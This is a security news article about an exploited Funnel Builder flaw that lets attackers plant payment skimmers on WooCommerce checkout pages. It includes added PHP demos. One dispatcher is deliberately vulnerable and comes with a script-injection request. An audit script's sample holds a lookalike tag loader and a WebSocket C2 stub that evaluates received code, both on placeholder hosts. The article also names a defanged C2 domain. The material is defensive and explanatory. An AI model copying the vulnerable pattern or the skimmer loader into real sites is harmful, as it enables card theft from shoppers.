A critical security vulnerability impacting the Funnel Builder plugin for WordPress has come under active exploitation in the wild to inject malicious JavaScript code into WooCommerce checkout pages with the goal of stealing payment data.
Details of the activity were published by Sansec this week. The vulnerability, which currently has no CVE identifier, affects all versions of the plugin before 3.15.0.3. Funnel Builder is installed on more than 40,000 WooCommerce stores.
The flaw lets unauthenticated attackers inject arbitrary JavaScript into every checkout page on the store, the Dutch e-commerce security company said. FunnelKit, which maintains Funnel Builder, has released a patch for the vulnerability in version 3.15.0.3.
"Attackers are planting fake Google Tag Manager scripts into the plugin's 'External Scripts' setting," it noted. "The injected code looks like ordinary analytics next to the store's real tags, but loads a payment skimmer that steals credit card numbers, CVVs, and billing addresses from checkout."
Per Sansec, Funnel Builder includes a publicly exposed checkout endpoint that lets the incoming request name which internal method should run. Older versions neither checked the caller's permissions nor restricted which methods could be invoked through it.
An attacker could exploit this by sending an unauthenticated request that reaches an unspecified internal method which writes attacker-controlled data directly into the plugin's global settings. Whatever is stored there is then injected into every Funnel Builder checkout page.
As a result, an attacker could plant a malicious <script> tag that executes on every checkout page load on a susceptible WordPress site.
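To make that bug class concrete, here is an added illustration in plain PHP. It is not Funnel Builder's code and is not taken from Sansec's write-up; the class, method and setting names are hypothetical, and the two "endpoints" are simulated with a request array so the file runs on its own with `php dispatch.php` (PHP 8 or later). In a real WordPress plugin, the caller check would map to `check_ajax_referer(..., false)` plus `current_user_can('manage_options')`, and the store to `update_option()` / `get_option()`.

```php
<?php
declare(strict_types=1);

// Added illustration of a request-named method dispatcher with and without an
// allowlist and permission check. Hypothetical code, not Funnel Builder's:
// class, method and setting names are assumptions. Runs without WordPress.

/** Stand-in for the plugin's persisted settings (update_option/get_option). */
final class SettingsStore
{
    public array $options = ['external_scripts' => ''];
}

/** The internal methods both endpoints expose; shared so only the dispatch differs. */
trait CheckoutMethods
{
    private function get_shipping_rates(array $request): string
    {
        return 'rates for ' . (string) ($request['country'] ?? 'unknown');
    }

    private function save_global_settings(array $request): string
    {
        // Whatever lands here is later echoed on every checkout page.
        $this->store->options['external_scripts'] = (string) ($request['scripts'] ?? '');
        return 'settings saved';
    }
}

/** Vulnerable shape: the request names the method; no allowlist, no permission check. */
final class VulnerableCheckoutEndpoint
{
    use CheckoutMethods;

    public function __construct(private SettingsStore $store) {}

    public function handle(array $request): string
    {
        $method = (string) ($request['method'] ?? '');
        if (method_exists($this, $method)) {
            return $this->$method($request);   // private methods are reachable from inside the class
        }
        return 'unknown method';
    }
}

/** Hardened shape: one allowlist per trust level, and a caller check for anything that writes. */
final class HardenedCheckoutEndpoint
{
    use CheckoutMethods;

    private const PUBLIC_METHODS = ['get_shipping_rates'];
    private const ADMIN_METHODS  = ['save_global_settings'];

    /** @var callable(): bool  true only for an administrator presenting a valid nonce */
    private $callerIsAdmin;

    public function __construct(private SettingsStore $store, callable $callerIsAdmin)
    {
        $this->callerIsAdmin = $callerIsAdmin;
    }

    public function handle(array $request): string
    {
        $method = (string) ($request['method'] ?? '');
        if (in_array($method, self::PUBLIC_METHODS, true)) {
            return $this->$method($request);
        }
        if (in_array($method, self::ADMIN_METHODS, true)) {
            if (!($this->callerIsAdmin)()) {
                return 'forbidden';
            }
            return $this->$method($request);
        }
        return 'unknown method';   // anything not allowlisted is rejected, whoever asks
    }
}

// Constructed request: an anonymous visitor asks for the settings writer.
$attack = [
    'method'  => 'save_global_settings',
    'scripts' => '<script src="https://tags.example.test/gtm.js"></script>', // placeholder domain
];

$store = new SettingsStore();
echo 'vulnerable: ' . (new VulnerableCheckoutEndpoint($store))->handle($attack) . "\n";
echo '  setting now holds: ' . $store->options['external_scripts'] . "\n";

$store = new SettingsStore();
$hardened = new HardenedCheckoutEndpoint($store, fn(): bool => false); // caller is not an admin
echo 'hardened:   ' . $hardened->handle($attack) . "\n";
echo '  setting now holds: "' . $store->options['external_scripts'] . "\"\n";
```

The fix is deliberately two-layered: the allowlist means a method name that is not meant to be public is rejected regardless of who calls, and the separate admin list means that even a known settings-writing method still needs a capability and nonce check. Relying on `method_exists()` alone, as the vulnerable class does, turns every method in the class into part of the public attack surface.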
In at least one case, Sansec said it observed a payload masquerading as a Google Tag Manager (GTM) loader that pulls JavaScript from a remote domain. That script then opens a WebSocket connection to the attacker's command-and-control (C2) server ("wss://protect-wss[.]com/ws") to retrieve a skimmer tailored to the victim's storefront.
The end goal is to siphon credit card numbers, CVVs, billing addresses, and other personal information entered by visitors at checkout. Site owners are advised to update Funnel Builder to version 3.15.0.3 or later and to review Settings > Checkout > External Scripts, removing anything unfamiliar.
"Dressing skimmers up as Google Analytics or Tag Manager code is a recurring Magecart pattern, since reviewers tend to skim straight past anything that looks like a familiar tracking tag," Sansec said.
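Because a fake tag is built to pass a glance, a mechanical check of that setting is worth more than eyeballing it. The following is an added example, not Sansec's or FunnelKit's tooling: a standalone PHP script that scans an External Scripts blob for tags that look like Google Tag Manager but load from a non-Google host, for WebSocket endpoints, and for runtime decoding or eval. The sample input is constructed and its domains are placeholders; the trusted-domain list is an assumption you should adjust to the tags your store actually uses.

```php
<?php
declare(strict_types=1);

// Added audit helper for a Funnel Builder "External Scripts" blob (or any
// injected HTML). Not Sansec's or FunnelKit's code. Runs with `php audit.php`
// (PHP 8 or later); the sample below is constructed and its domains are placeholders.

// Assumption: only these domains (and their subdomains) may serve GTM / gtag code.
const TRUSTED_TAG_DOMAINS = ['googletagmanager.com', 'google-analytics.com'];

function is_trusted_tag_host(string $host): bool
{
    foreach (TRUSTED_TAG_DOMAINS as $domain) {
        if ($host === $domain || str_ends_with($host, '.' . $domain)) {
            return true;
        }
    }
    return false;
}

/** One human-readable finding per suspicious trait; an empty array means nothing was flagged. */
function audit_external_scripts(string $html): array
{
    $findings = [];
    preg_match_all('#<script\b[^>]*>.*?</script>#is', $html, $tags);

    foreach ($tags[0] as $i => $tag) {
        $n = $i + 1;
        // Does the snippet dress itself up as GTM / gtag?
        $looksLikeGoogleTag = preg_match('/googletagmanager|gtm\.js|gtag|\bGTM-[A-Z0-9]+|dataLayer/i', $tag) === 1;

        // Every absolute URL in the tag, whether in a src attribute or assembled inside the body.
        preg_match_all('#\b(https?|wss?)://([a-z0-9.-]+)#i', $tag, $urls, PREG_SET_ORDER);
        foreach ($urls as [, $scheme, $host]) {
            $host   = strtolower($host);
            $scheme = strtolower($scheme);
            if ($scheme === 'ws' || $scheme === 'wss') {
                $findings[] = "script #$n opens a WebSocket to $host";
            } elseif ($looksLikeGoogleTag && !is_trusted_tag_host($host)) {
                $findings[] = "script #$n looks like Google Tag Manager but loads from $host";
            }
        }

        if (preg_match('/\b(atob|eval|Function)\s*\(/', $tag) === 1) {
            $findings[] = "script #$n decodes or evaluates code at runtime";
        }
    }
    return $findings;
}

// Constructed sample: a loader modelled on the standard GTM snippet, a lookalike
// pointing elsewhere, and a stage-two loader that talks to a WebSocket C2.
$sample = <<<'HTML'
<!-- loader modelled on the standard GTM snippet -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});
var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;
j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-EXAMPLE');</script>
<!-- lookalike loader pointing at a non-Google host (constructed placeholder) -->
<script>(function(w,d,s,l,i){var j=d.createElement(s);j.async=true;
j.src='https://tagmanager-cdn.example.test/gtm.js?id='+i;d.head.appendChild(j);
})(window,document,'script','dataLayer','GTM-EXAMPLE');</script>
<!-- stage-two loader talking to a WebSocket C2 (constructed placeholder) -->
<script>var s=new WebSocket('wss://c2.example.test/ws');s.onmessage=function(e){eval(atob(e.data));};</script>
HTML;

foreach (audit_external_scripts($sample) as $finding) {
    echo $finding, "\n";
}
```

Treat this as a triage aid rather than proof of a clean setting: a loader that assembles its URL from concatenated or encoded fragments slips past the host regex, so a clean run should still be followed by watching the live checkout page's network requests in the browser developer tools, where the real destination host and any WebSocket connection are visible regardless of how the script was written.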
The disclosure comes weeks after Sucuri detailed a campaign in which Joomla websites are being backdoored with heavily obfuscated PHP code that contacts attacker-controlled C2 servers, receives and processes the operators' instructions, and serves spam content to visitors and search engines without the site owner's knowledge. The ultimate aim is to abuse the compromised sites' reputation to push spam.
"The script acts as a remote loader," security researcher Puja Srivastava said. "It contacts an external server, sends information about the infected website, and waits for instructions. The response from the remote server determines what content the infected site should serve."
"This approach allows attackers to change the behavior of the compromised website at any time without modifying the local files again. The attacker can inject spam product links, redirect visitors, or display malicious pages dynamically."
Update
In a statement shared with The Hacker News, FunnelKit said it patched and released a fix for the vulnerability within 36 hours of the first report, adding it worked with the official WordPress.org plugin team to auto-update existing installations to the latest version without requiring any action from the merchants.
Out of an abundance of caution, the company said the fix has also been backported to all earlier versions and known attacker domains have been blocked at the DNS level to neutralize the attack vector.
"The vulnerability has been patched and the active exploitation path has been closed," FunnelKit said in a statement. "Stores running version 3.15.0.3 or later, including those automatically updated through WordPress.org, are no longer vulnerable to this issue and are not exposed to the previously reported attack."
"The overall impact appears to have been limited. During the nine days following disclosure, our monitoring covered a sample of more than 1,300 sites. Of those, only three showed signs of compromise before our mitigations took effect. We believe this limited impact was due to the speed of the patch release, the automatic update rollout coordinated through WordPress.org, and the domain-blocking measures that disrupted the attack infrastructure."
(The story was updated after publication on May 31, 2026, to include a response from FunnelKit and reflect the fact that the vulnerability is no longer actively exploited.)